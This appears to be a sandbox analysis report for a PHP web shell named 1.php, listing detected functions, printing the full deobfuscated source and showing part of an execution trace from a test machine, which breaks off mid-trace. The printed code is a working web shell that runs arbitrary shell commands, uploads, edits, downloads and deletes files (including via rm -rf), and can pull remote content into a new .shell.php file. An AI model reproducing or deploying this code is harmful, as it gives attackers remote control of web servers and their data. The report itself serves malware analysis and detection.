1.php

md5: d8992f44fb3646573cb5b7bc6f960d19

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)
php_uname (Deobfuscated, Original, Traces)
set_time_limit (Deobfuscated, Original, Traces)

Execution
exec (Deobfuscated, Original)
passthru (Deobfuscated, Original)
shell_exec (Deobfuscated, Original)
system (Deobfuscated, Original)

Files
copy (Deobfuscated, Original)
file_get_contents (Deobfuscated, Original)
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
 (Original)
Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 (HTML)

Deobfuscated PHP code
<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<?php 
error_reporting(0);
set_time_limit(0);
header("X-XSS-Protection: 0");
function getpath()
{
    if (isset($_GET['d'])) {
        $d = $_GET['d'];
    } else {
        $d = getcwd();
    }
    return $d;
}
function cmd($cmd)
{
    if (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif (function_exists('exec')) {
        @exec($cmd, $results);
        $buff = "";
        foreach ($results as $result) {
            $buff .= $result;
        }
        return $buff;
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif (function_exists('shell_exec')) {
        $buff = @shell_exec($cmd);
        return $buff;
    }
}
function delete($dir)
{
    if (is_dir($dir)) {
        if (!rmdir($dir)) {
            $s = scandir($dir);
            foreach ($s as $ss) {
                if (is_file($dir . "/" . $ss)) {
                    if (unlink($dir . "/" . $ss)) {
                        $rm = rmdir($dir);
                    }
                }
                if (is_dir($dir . "/" . $ss)) {
                    $rm = rmdir($dir . "/" . $ss);
                    $rm .= rmdir($dir);
                    $rm .= system('rm -rf ' . $dir);
                }
            }
        }
    } elseif (is_file($dir)) {
        $rm = unlink($dir);
        if (!$rm) {
            system('rm -rf ' . $dir);
        }
    }
    return $rm;
}
function getowner($path)
{
    if (function_exists('posix_getpwuid')) {
        $downer = @posix_getpwuid(fileowner($path));
        $downer = $downer['name'];
    } else {
        $downer = fileowner($path);
    }
    return $downer;
}
function getgroup($path)
{
    if (function_exists('posix_getgrgid')) {
        $dgrp = @posix_getgrgid(filegroup($path));
        $dgrp = $dgrp['name'];
    } else {
        $dgrp = filegroup($path);
    }
    return $dgrp;
}
function upload($a, $b)
{
    if (function_exists('move_uploaded_file')) {
        $upl = move_uploaded_file($a, $b);
    } elseif (function_exists('copy')) {
        $upl = copy($a, $b);
    }
    return $upl;
}
function array_upload($file)
{
    $file_ary = array();
    $file_count = count($file['name']);
    $file_key = array_keys($file);
    for ($i = 0; $i < $file_count; $i++) {
        foreach ($file_key as $val) {
            $file_ary[$i][$val] = $file[$val][$i];
        }
    }
    return $file_ary;
}
function sedirs($dir)
{
    if (function_exists('scandir')) {
        $s = scandir($dir);
        chdir($dir);
    } else {
        $s = system($dir);
    }
    return $s;
}
function getperms($files)
{
    if ($s_m = @fileperms($files)) {
        $s_p = 'u';
        if (($s_m & 0xc000) == 0xc000) {
            $s_p = 's';
        } elseif (($s_m & 0xa000) == 0xa000) {
            $s_p = 'l';
        } elseif (($s_m & 0x8000) == 0x8000) {
            $s_p = '-';
        } elseif (($s_m & 0x6000) == 0x6000) {
            $s_p = 'b';
        } elseif (($s_m & 0x4000) == 0x4000) {
            $s_p = 'd';
        } elseif (($s_m & 0x2000) == 0x2000) {
            $s_p = 'c';
        } elseif (($s_m & 0x1000) == 0x1000) {
            $s_p = 'p';
        }
        $s_p .= $s_m & 0400 ? 'r' : '-';
        $s_p .= $s_m & 0200 ? 'w' : '-';
        $s_p .= $s_m & 0100 ? 'x' : '-';
        $s_p .= $s_m & 040 ? 'r' : '-';
        $s_p .= $s_m & 020 ? 'w' : '-';
        $s_p .= $s_m & 010 ? 'x' : '-';
        $s_p .= $s_m & 04 ? 'r' : '-';
        $s_p .= $s_m & 02 ? 'w' : '-';
        $s_p .= $s_m & 01 ? 'x' : '-';
        return $s_p;
    } else {
        return "???????????";
    }
}
function downloads($file)
{
    @ob_clean();
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
function viewfilefunc($file)
{
    echo "<center><h1> View : " . basename($file) . "</h1>";
    echo "<textarea readonly cols='100' rows='40'>";
    echo htmlspecialchars(file_get_contents($file));
    echo "</textarea></center>";
}
function ts($s_s)
{
    if ($s_s <= 0) {
        return 0;
    }
    $s_w = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
    $s_e = floor(log($s_s) / log(1024));
    return sprintf('%.2f ' . $s_w[$s_e], $s_s / pow(1024, floor($s_e)));
}
function getsize($s_f)
{
    $s_s = @filesize($s_f);
    if ($s_s !== false) {
        if ($s_s <= 0) {
            return 0;
        }
        return ts($s_s);
    } else {
        return "???";
    }
}
function kuchiyose($a, $b)
{
    $fgc = file_get_contents($a);
    $fp = fopen($b . ".shell.php", 'w');
    fwrite($fp, $fgc);
    fclose($fp);
}
function cekk($f)
{
    if (file_exists($f . ".shell.php")) {
        echo "<b>Request done ! <a href='{$f}.shell.php' target='_blank'>Click here</a>";
    }
}
function renamefunc($dir, $oldname)
{
    echo "<center><h1>Rename : " . $oldname . "</h1><br><form method='POST' class='in'>oldname : <input type='text' value='{$oldname}' class='in' readonly>";
    echo "Newname : <input type='text' name='newname' value='newname' class='in'><input type='submit' value='>>' name='s'></form></center>";
    if (isset($_POST['s'])) {
        rename($dir . "/" . $oldname, $dir . "/" . $_POST['newname']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . dirname($dir) . "'>";
    }
}
function editfunc($dir, $file)
{
    echo "<center><h1> Edit : " . $file . "</h1><br><form method='POST'>";
    echo "<textarea name='editfile' cols='100' rows='40'>" . htmlspecialchars(file_get_contents($dir . "/" . $file)) . "</textarea><br>";
    echo "<input type='submit' name='sbmt' value='>>submit<<' style='width:200px;'>";
    echo "</form>";
    if (isset($_POST['sbmt'])) {
        $fp = fopen($dir . "/" . $file, 'w');
        fwrite($fp, $_POST['editfile']);
        fclose($fp);
        echo "<br><b>Tersimpan @" . date('D ,d m Y') . "</b><br>";
    }
}
function berinamafunc($dir)
{
    echo "<center><h1>New file </h1><br><form method='POST' class='in'>";
    echo "Filename : <input type='text' name='filename' value='newfile.php'>";
    echo "<input type='submit' name='svi' value='>>'>";
    echo "</form>";
    if (isset($_POST['svi'])) {
        if (function_exists('touch')) {
            touch($dir . "/" . $_POST['filename']);
        } else {
            $fp = fopen($dir . "/" . $_POST['filename'], 'w');
            fwrite($fp, '#new file 1945');
            fclose($fp);
        }
        header('location:?d=' . $dir . '&a=edit&f=' . $_POST['filename']);
    }
}
function mkdirfunc($dir)
{
    echo "<center><h1>New directory</h1>";
    echo "<form method='POST' class='in'>New dir:<input type='text' name='mkdir'>";
    echo "<input type='submit' name='sbmt' value='>>'></form></center>";
    if (isset($_POST['sbmt'])) {
        mkdir($dir . "/" . $_POST['mkdir']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . $dir . "'>";
    }
}
$gp = getpath();
$y = php_uname();
?>
	<title><?php 
echo $y;
?></title>
</head>
<body>
</form>
<form method="post" class="in" enctype="multipart/form-data" action="?d=<?php 
echo $gp;
?>&a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=<?php 
echo $gp;
?>&a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=<?php 
echo $gp;
?>&a=up">
</form>
<a href="?d=<?php 
echo $gp;
?>&a=up">Upload</a>
</div>
<hr>
<?php 
echo "Current Dir=|> ";
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?d=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "<a href=\"?d=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
if (empty($_GET['a'])) {
    ?>
<table align="center" class="table">
	<th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
<?php 
    $dir = sedirs(getpath());
    echo "<tr><td><a href=\"?d=" . dirname($gp) . "\">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align=right><a href='?d={$gp}&a=touch'>Newfile</a> | <a href='?d={$gp}&a=mkdir'>newdir</a></td></tr>";
    foreach ($dir as $d1) {
        if (!is_dir("{$gp}/{$d1}") || $d1 == "." || $d1 == "..") {
            continue;
        }
        ?>
	<tr><td>[<a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>"><?php 
        echo $d1;
        ?></a>]</td>
	<td><?php 
        echo getsize("{$gp}/{$d1}");
        ?></td>
	<td><?php 
        echo getowner("{$gp}/{$f1}");
        ?>:<?php 
        echo getgroup("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getperms("{$gp}/{$d1}");
        ?></td>
	<td align="right"><a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>&a=rename">Rename</a> | <a href="?d=<?php 
        echo "{$gp}/{$d1}";
        ?>&a=delete">Delete</a></td>
	</tr>
	<?php 
    }
    foreach ($dir as $f1) {
        if (!is_file("{$gp}/{$f1}") || $f1 == "." || $f1 == "..") {
            continue;
        }
        ?>
	<tr><td><a href="?d=<?php 
        echo $gp;
        ?>&a=view&f=<?php 
        echo $f1;
        ?>"><?php 
        echo $f1;
        ?></a></td>
	<td><?php 
        echo getsize("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getowner("{$gp}/{$f1}");
        ?>:<?php 
        echo getgroup("{$gp}/{$f1}");
        ?></td>
	<td><?php 
        echo getperms("{$gp}/{$f1}");
        ?></td>
	<td align="right">
	<a href="?d=<?php 
        echo $gp;
        ?>&a=rename&f=<?php 
        echo $f1;
        ?>">Rename</a> |
	<a href="?d=<?php 
        echo "{$gp}/{$f1}";
        ?>&a=delete">delete</a> |
	<a href="?d=<?php 
        echo $gp;
        ?>&a=edit&f=<?php 
        echo $f1;
        ?>">edit</a> |
	<a href="?d=<?php 
        echo $gp;
        ?>&a=download&f=<?php 
        echo $f1;
        ?>">download</a></td>
	</tr>
	<?php 
    }
    ?>
</table>
<?php 
} else {
    @($a = $_GET['a']);
    @($f = $_GET['f']);
    @($d = $_GET['d']);
    if ($a == "view") {
        viewfilefunc($d . "/" . $f);
    } elseif ($a == "download") {
        downloads($d . "/" . $f);
    } elseif ($a == "logout") {
        if (setcookie(md5($_SERVER['HTTP_HOST']), "")) {
            echo "<script>alert('See You Next time !');window.location.href='????'</script>";
        }
    } elseif ($a == "rename") {
        $ff = isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']);
        $gdd = isset($_GET['f']) ? $_GET['d'] : dirname($_GET['d']);
        renamefunc($gdd, $ff);
    } elseif ($a == "delete") {
        delete($_GET['d']);
        echo "<meta http-equiv='refresh' content='0;url=?d=" . dirname($_GET['d']) . "'>";
    } elseif ($a == "upload") {
        $fil = array_upload($_FILES['filup']);
        foreach ($fil as $filup) {
            $filoc = $d . "/" . $filup['name'];
            if (upload($filup['tmp_name'], $filoc)) {
                echo "<font color=lime>Successfully upload -> <a href='?d=" . $d . "&a=view&f=" . $filup['name'] . "'>" . $filoc . "</a></font><br>";
            } else {
                echo "<font color=red>Failed upload -> " . $filoc . "</font><br>";
            }
        }
    } elseif ($a == "mkdir") {
        mkdirfunc($d);
    } elseif ($a == "touch") {
        berinamafunc($d);
    } elseif ($a == "edit") {
        editfunc($_GET['d'], $_GET['f']);
    }
}
Execution traces
data/traces/d8992f44fb3646573cb5b7bc6f960d19_trace-1676248852.0826.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:41:17.980478]
1	0	1	0.000164	393464
1	3	0	0.000643	478472	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000661	478472	error_reporting	0		/var/www/html/uploads/1.php	39	1	0
2	4	1	0.000677	478512
2	4	R			22527
2	5	0	0.000690	478472	set_time_limit	0		/var/www/html/uploads/1.php	40	1	0
2	5	1	0.000706	478536
2	5	R			FALSE
2	6	0	0.000719	478504	header	0		/var/www/html/uploads/1.php	41	1	'X-XSS-Protection: 0'
2	6	1	0.000735	478600
2	6	R			NULL
2	7	0	0.000750	478568	getpath	1		/var/www/html/uploads/1.php	186	0
3	8	0	0.000762	478568	getcwd	0		/var/www/html/uploads/1.php	48	0
3	8	1	0.000775	478616
3	8	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/1.php	48	$d = '/var/www/html/uploads'
2	7	1	0.000802	478616
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	186	$gp = '/var/www/html/uploads'
2	9	0	0.000827	478616	php_uname	0		/var/www/html/uploads/1.php	187	0
2	9	1	0.000840	478728
2	9	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/1.php	187	$y = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	10	0	0.000876	478728	getcwd	0		/var/www/html/uploads/1.php	204	0
2	10	1	0.000888	478776
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	204	$path = '/var/www/html/uploads'
2	11	0	0.000912	478776	str_replace	0		/var/www/html/uploads/1.php	206	3	'\\'	'/'	'/var/www/html/uploads'
2	11	1	0.000927	478872
2	11	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	206	$path = '/var/www/html/uploads'
2	12	0	0.000951	478776	explode	0		/var/www/html/uploads/1.php	207	2	'/'	'/var/www/html/uploads'
2	12	1	0.000964	479352
2	12	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/1.php	207	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/1.php	209	$id = 0
1		A						/var/www/html/uploads/1.php	211	$a = TRUE
1		A						/var/www/html/uploads/1.php	209	$id = 1
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 2
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 3
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	209	$id = 4
1		A						/var/www/html/uploads/1.php	217	$i = 0
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
1		A						/var/www/html/uploads/1.php	217	$i++
2	13	0	0.001194	479280	getpath	1		/var/www/html/uploads/1.php	230	0
3	14	0	0.001205	479280	getcwd	0		/var/www/html/uploads/1.php	48	0
3	14	1	0.001217	479328
3	14	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/1.php	48	$d = '/var/www/html/uploads'
2	13	1	0.001241	479328
2	13	R			'/var/www/html/uploads'
2	15	0	0.001255	479328	sedirs	1		/var/www/html/uploads/1.php	230	1	'/var/www/html/uploads'
3	16	0	0.001268	479328	function_exists	0		/var/www/html/uploads/1.php	59	1	'scandir'
3	16	1	0.001281	479368
3	16	R			TRUE
3	17	0	0.001294	479328	scandir	0		/var/www/html/uploads/1.php	61	1	'/var/www/html/uploads'
3	17	1	0.001323	479944
3	17	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2		A						/var/www/html/uploads/1.php	61	$s = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
3	18	0	0.001360	479912	chdir	0		/var/www/html/uploads/1.php	62	1	'/var/www/html/uploads'
3	18	1	0.001374	480000
3	18	R			TRUE
2	15	1	0.001393	479960
2	15	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	230	$dir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2	19	0	0.001427	479912	dirname	0		/var/www/html/uploads/1.php	231	1	'/var/www/html/uploads'
2	19	1	0.001440	479992
2	19	R			'/var/www/html'
2	20	0	0.001456	479960	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/.'
2	20	1	0.001470	480024
2	20	R			TRUE
2	21	0	0.001484	479992	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/..'
2	21	1	0.001498	480040
2	21	R			TRUE
2	22	0	0.001511	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/.htaccess'
2	22	1	0.001526	480040
2	22	R			FALSE
2	23	0	0.001538	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/1.php'
2	23	1	0.001552	480040
2	23	R			FALSE
2	24	0	0.001564	480000	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/data'
2	24	1	0.001577	480040
2	24	R			TRUE
2	25	0	0.001591	480000	getsize	1		/var/www/html/uploads/1.php	236	1	'/var/www/html/uploads/data'
3	26	0	0.001603	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/data'
3	26	1	0.001615	480040
3	26	R			4096
2		A						/var/www/html/uploads/1.php	118	$s_s = 4096
3	27	0	0.001638	480000	ts	1		/var/www/html/uploads/1.php	121	1	4096
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	28	0	0.001666	480000	log	0		/var/www/html/uploads/1.php	114	1	4096
4	28	1	0.001695	480032
4	28	R			8.3177661667193
4	29	0	0.001709	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	29	1	0.001720	480032
4	29	R			6.9314718055995
4	30	0	0.001735	480000	floor	0		/var/www/html/uploads/1.php	114	1	1.2
4	30	1	0.001747	480032
4	30	R			1
3		A						/var/www/html/uploads/1.php	114	$s_e = 1
4	31	0	0.001769	480032	floor	0		/var/www/html/uploads/1.php	115	1	1
4	31	1	0.001781	480064
4	31	R			1
4	32	0	0.001793	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	1
4	32	1	0.001811	480104
4	32	R			1024
4	33	0	0.001823	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f KB'	4
4	33	1	0.001838	480416
4	33	R			'4.00 KB'
3	27	1	0.001851	480320
3	27	R			'4.00 KB'
2	25	1	0.001864	480320
2	25	R			'4.00 KB'
2	34	0	0.001879	479992	getowner	1		/var/www/html/uploads/1.php	237	1	'/var/www/html/uploads/'
3	35	0	0.001892	479992	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	35	1	0.001905	480032
3	35	R			TRUE
3	36	0	0.001918	479992	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/'
3	36	1	0.001932	480024
3	36	R			0
3	37	0	0.001944	479984	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	37	1	0.001972	480784
3	37	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	34	1	0.002024	480016
2	34	R			'root'
2	38	0	0.002038	479984	getgroup	1		/var/www/html/uploads/1.php	237	1	'/var/www/html/uploads/'
3	39	0	0.002050	479984	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	39	1	0.002063	480024
3	39	R			TRUE
3	40	0	0.002075	479984	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/'
3	40	1	0.002087	480024
3	40	R			0
3	41	0	0.002099	479984	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	41	1	0.002123	480640
3	41	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	38	1	0.002167	480016
2	38	R			'root'
2	42	0	0.002181	479992	getperms	1		/var/www/html/uploads/1.php	238	1	'/var/www/html/uploads/data'
3	43	0	0.002193	479992	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/data'
3	43	1	0.002207	480040
3	43	R			16895
2		A						/var/www/html/uploads/1.php	70	$s_m = 16895
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	76	$s_p = 'd'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	84	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	87	$s_p .= 'x'
2	42	1	0.002335	480040
2	42	R			'drwxrwxrwx'
2	44	0	0.002350	480008	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/prepend.php'
2	44	1	0.002365	480056
2	44	R			FALSE
2	45	0	0.002379	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/.'
2	45	1	0.002393	480024
2	45	R			FALSE
2	46	0	0.002406	479992	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/..'
2	46	1	0.002420	480040
2	46	R			FALSE
2	47	0	0.002433	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/.htaccess'
2	47	1	0.002447	480040
2	47	R			TRUE
2	48	0	0.002462	480000	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/.htaccess'
3	49	0	0.002474	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/.htaccess'
3	49	1	0.002487	480040
3	49	R			64
2		A						/var/www/html/uploads/1.php	118	$s_s = 64
3	50	0	0.002510	480000	ts	1		/var/www/html/uploads/1.php	121	1	64
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	51	0	0.002537	480000	log	0		/var/www/html/uploads/1.php	114	1	64
4	51	1	0.002549	480032
4	51	R			4.1588830833597
4	52	0	0.002562	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	52	1	0.002573	480032
4	52	R			6.9314718055995
4	53	0	0.002587	480000	floor	0		/var/www/html/uploads/1.php	114	1	0.6
4	53	1	0.002598	480032
4	53	R			0
3		A						/var/www/html/uploads/1.php	114	$s_e = 0
4	54	0	0.002620	480032	floor	0		/var/www/html/uploads/1.php	115	1	0
4	54	1	0.002631	480064
4	54	R			0
4	55	0	0.002643	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	0
4	55	1	0.002655	480104
4	55	R			1
4	56	0	0.002667	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f B'	64
4	56	1	0.002681	480416
4	56	R			'64.00 B'
3	50	1	0.002694	480320
3	50	R			'64.00 B'
2	48	1	0.002707	480320
2	48	R			'64.00 B'
2	57	0	0.002721	480000	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/.htaccess'
3	58	0	0.002733	480000	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	58	1	0.002746	480040
3	58	R			TRUE
3	59	0	0.002759	480000	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/.htaccess'
3	59	1	0.002772	480040
3	59	R			0
3	60	0	0.002784	480000	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	60	1	0.002807	480800
3	60	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	57	1	0.002858	480032
2	57	R			'root'
2	61	0	0.002872	480000	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/.htaccess'
3	62	0	0.002885	480000	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	62	1	0.002897	480040
3	62	R			TRUE
3	63	0	0.002910	480000	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/.htaccess'
3	63	1	0.002923	480040
3	63	R			0
3	64	0	0.002934	480000	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	64	1	0.002956	480656
3	64	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	61	1	0.003000	480032
2	61	R			'root'
2	65	0	0.003018	480000	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/.htaccess'
3	66	0	0.003031	480000	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/.htaccess'
3	66	1	0.003043	480040
3	66	R			33188
2		A						/var/www/html/uploads/1.php	70	$s_m = 33188
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	84	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= '-'
2	65	1	0.003162	480040
2	65	R			'-rw-r--r--'
2	67	0	0.003178	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/1.php'
2	67	1	0.003192	480040
2	67	R			TRUE
2	68	0	0.003207	480000	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/1.php'
3	69	0	0.003218	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/1.php'
3	69	1	0.003230	480040
3	69	R			9731
2		A						/var/www/html/uploads/1.php	118	$s_s = 9731
3	70	0	0.003253	480000	ts	1		/var/www/html/uploads/1.php	121	1	9731
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	71	0	0.003281	480000	log	0		/var/www/html/uploads/1.php	114	1	9731
4	71	1	0.003293	480032
4	71	R			9.183071944822
4	72	0	0.003307	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	72	1	0.003318	480032
4	72	R			6.9314718055995
4	73	0	0.003332	480000	floor	0		/var/www/html/uploads/1.php	114	1	1.3248372354921
4	73	1	0.003343	480032
4	73	R			1
